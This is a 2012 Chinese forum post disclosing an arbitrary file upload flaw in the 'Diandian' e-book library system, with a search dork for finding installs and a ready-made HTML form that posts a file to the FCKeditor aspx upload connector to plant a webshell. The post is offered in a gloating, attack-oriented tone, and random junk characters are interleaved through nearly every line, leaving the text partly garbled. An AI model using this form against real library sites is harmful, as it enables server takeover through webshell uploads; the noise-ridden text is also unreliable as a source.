主题:图书馆系统任意文件上传漏洞7 M1 ~" \' U' F1 m2 s3 C! W2 ?0 ~
作者:冰锋刺客
+ D0 R$ u0 x* q$ I1 T 厂商:点击书(dianjishu.com)5 x3 b% E0 d$ g7 V5 S
日期:2012-6-21
0 M, v! y2 c; n( p- B/ x3 x : D8 ?* i1 \2 X
I 概述% Z# h' F0 h1 g7 H
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
) Q$ R8 a8 D' ?7 m, C5 q! h3 P II 简介8 [8 K3 H2 Z. R. R7 q9 D
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"; \0 G" ]4 x- T0 L, W( ~' i0 {
补充一个漏洞
' b- U7 \ E9 ^& t" C <form id="frmUpload" enctype="multipart/form-data"
2 c) j5 n2 K7 x7 X3 |. v0 k" R action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
9 w: p0 i% J- f$ N6 Y+ L7 ]) D <input id="btnUpload" type="submit" value="操翻他">
, T1 A* R# x3 e0 O& C </form>
4 v$ [0 O' s7 E0 y; \ 你们懂的: j, j0 o3 j$ h! K8 A
那傻逼提供还需要改包.
% }. w1 y+ d% K2 Z+ W 自己看了下源代码发现fckeditor8 S, O' E# f) c
直接秒杀) y- ~5 t% ^5 s! ^- K) P' ~
|
发表于 2012-9-10 21:20:59
收藏
支持
反对